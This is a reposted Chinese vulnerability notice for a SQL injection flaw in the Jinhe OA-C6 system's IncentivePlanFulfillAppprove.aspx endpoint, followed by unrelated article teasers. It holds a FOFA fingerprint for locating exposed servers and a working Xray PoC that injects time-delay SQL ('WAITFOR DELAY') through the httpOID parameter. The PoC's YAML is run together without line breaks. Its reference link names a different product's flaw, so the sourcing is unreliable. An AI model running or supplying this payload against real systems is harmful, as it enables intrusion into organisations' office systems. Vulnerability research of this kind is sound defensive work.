金和OA-C6系统接口IncentivePlanFulfillAppprove.aspx存在SQL注入漏洞

news/2025/2/24 9:35:10/文章来源:https://www.cnblogs.com/0neOr2eR0/p/18733376

  参考链接:

 https://github.com/wy876/POC/blob/1a7300f4f0793a08d1255a474e71a4854613ffd2/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8BU8CRM%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3setremindtoold.php%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md

漏洞介绍:

 

金和OA-C6系统接口IncentivePlanFulfillAppprove.aspx存在SQL注入漏洞

 

 

资产指纹:

 

app="金和网络-金和OA"

 Xray-poc:

 

name: poc-yaml-jinhe-oa-c6-incentiveplanfulfillappprove-sqli
transport: http
set:sleepSecond1: randomInt(6, 8)sleepSecond2: randomInt(3, 5)
rules:r0:request:method: GETpath: /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfillAppprove.aspx/?httpOID=1;WAITFOR+DELAY+'0:0:0'--headers:Content-Type: application/x-www-form-urlencodedexpression: >-response.status == 200 && response.headers["Content-Length"]=="38"output:undelayedLantency: response.latencyr1:request:method: GETpath: /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfillAppprove.aspx/?httpOID=1;WAITFOR+DELAY+'0:0:{{sleepSecond1}}'--headers:Content-Type: application/x-www-form-urlencodedexpression: >-response.latency - undelayedLantency >= sleepSecond1 * 1000 - 1000 && response.status == 200 && response.headers["Content-Length"]=="38"r2:request:method: GETpath: /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfillAppprove.aspx/?httpOID=1;WAITFOR+DELAY+'0:0:{{sleepSecond2}}'--headers:Content-Type: application/x-www-form-urlencodedexpression: >-response.latency - undelayedLantency >= sleepSecond2 * 1000 - 1000 && response.status == 200 && response.headers["Content-Length"]=="38"
expression: r0() && r1() && r2()
detail:author: Cyseclinks:- https://github.com/wy876/POC/blob/1a7300f4f0793a08d1255a474e71a4854613ffd2/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8BU8CRM%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3setremindtoold.php%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.mddescription: 金和OA-C6系统接口IncentivePlanFulfillAppprove.aspx存在SQL注入漏洞fofakewrods: app="金和网络-金和OA"

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/888892.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

一个支持多家云存储驱动的公有云文件系统!

一个支持多家云存储驱动的公有云文件系统!

Cloudreve —— 一个基于 Go + React 实现的支持多家云存储驱动的公有云文件系统,适用于搭建个人网盘、文件分享系统等。大家好,我是 Java陈序员。 在日常生活中,我们会记录很多精彩的瞬间,或图片或视频,并存放在网盘中。 然而,很多商业网盘下载速度慢,而且不能很好地保…
阅读更多...
传统ftp软件问题频出,一文了解适配的替代方案!

传统ftp软件问题频出,一文了解适配的替代方案!

在互联网发展的早期,ftp软件凭借其简单易用的特性,成为了文件传输领域的中流砥柱,帮助无数企业实现文件的远程传输与共享。时过境迁,在如今数据量呈爆炸式增长、网络环境愈发复杂的时代,ftp软件就像一位上了年纪的老将,逐渐显露出诸多力不从心之处。 1.数据裸奔的安全风…
阅读更多...
原创--记一次配置小米路由器(miwifi)的过程

原创--记一次配置小米路由器(miwifi)的过程

1.登录2.登录后3.4.设置WAN口IP相关信息5.设置LAN口IP相关信息至此,配置完成,打通了LAN口与WAN口之间的数据传输 大概示意图如下: 海阔凭鱼跃,天高任鸟飞,成功没有捷径,唯有努力前行!
阅读更多...
大三下每日打卡002(搭建Android平台和创建HelloWorld并发布apk)

大三下每日打卡002(搭建Android平台和创建HelloWorld并发布apk)

实验一:搭建Android平台和创建HelloWorld 实验目的 本次实验的目的是让大家熟悉搭建智能手机开发平台的过程,了解Andorid开发项目的基本文件目录结构,并实现HelloWorld小例程。 实验要求完成Android开发平台的搭建及相关配置 创建项目并熟悉文件目录结构 实现例程HelloWorld…
阅读更多...
TOTP算法介绍

TOTP算法介绍

摘要 本文根据 RFC4226 和 RFC6238 文档,详细的介绍 HOTP 和 TOTP 算法的原理和实现。 两步验证已经被广泛应用于各种互联网应用当中,用来提供安全性。对于如何使用两步验证,大家并不陌生,无非是开启两步验证,然后出现一个二维码,使用支持两步验证的移动应用比如 Google …
阅读更多...
5090D-deepseek-Anythingllm-Ollama运行测试

5090D-deepseek-Anythingllm-Ollama运行测试

ollama ollama配置环境变量ollama地址与镜像 C:\Users\DK>curl http://10.208.10.240:11434 Ollama is running C:\Users\DK>ollama list NAME ID SIZE MODIFIED bge-m3:latest 790764642607 1.2 GB 28 ho…
阅读更多...
web课程

web课程

<!DOCTYPE html> <html lang="en"> <head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>这是一个标题</title> </head> &…
阅读更多...
解密ZAB协议:Zookeeper一致性的核心实现

解密ZAB协议:Zookeeper一致性的核心实现

一致性问题 设计一个分布式系统必定会遇到一个问题—— 因为分区容忍性(partition tolerance)的存在,就必定要求我们需要在系统可用性(availability)和数据一致性(consistency)中做出权衡 。这就是著名的 CAP 定理。 ZooKeeper 的处理方式,保证了 CP(数据一致性) 一致…
阅读更多...
解密prompt系列49. 回顾R1之前的思维链发展路线

解密prompt系列49. 回顾R1之前的思维链发展路线

我先按照自己的思路来梳理下R1之前整个模型思维链的发展过程,可以分成3个阶段:大模型能思考,外生慢思考,内生慢思考在所有人都在谈论R1的今天,作为算法也是有些千头万绪无从抓起。所以这一章先复盘,我先按照自己的思路来梳理下R1之前整个模型思维链的发展过程。下一章再展…
阅读更多...
CSnakes vs Python.NET:高效嵌入与灵活互通的跨语言方案对比

CSnakes vs Python.NET:高效嵌入与灵活互通的跨语言方案对比

CSnakes 是一个用于在.NET项目中嵌入Python代码的工具,由.NET源生成器和运行时组成,能够实现高效的跨语言调用,Github:https://github.com/tonybaloney/CSnakes。以下是关键信息整理:核心特性跨版本支持:兼容.NET 8-9、Python 3.9-3.13,支持Windows/macOS/Linux系统高性…
阅读更多...
Plotly.NET 一个为 .NET 打造的强大开源交互式图表库

Plotly.NET 一个为 .NET 打造的强大开源交互式图表库

前言 今天大姚给大家分享一个 .NET 强大、免费、开源的交互式图表库:Plotly.NET。 项目介绍 Plotly.NET 一个为 .NET 打造的强大、免费、开源的交互式图表库,支持 C# 和 F#编程语言,它构建在 plotly.js 之上并提供多个 API 层,用于创建、样式化和渲染美观的数据可视化图表。…
阅读更多...
Apple Store 无法更新 App 解决方案 All In One

Apple Store 无法更新 App 解决方案 All In One

Apple Store 无法更新 App 解决方案 All In One Apple store 中可以查看新版 App, 但是无法更新新版 App, 会一直在转圈加载, 然后更新失败 ❌ 新版 Apps 与当前操作系统版本不匹配,需要先更新系统,才能安装新版的 Apps 更新 iOS 系统 ✅Apple Store 无法更新 App 解决方案 A…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023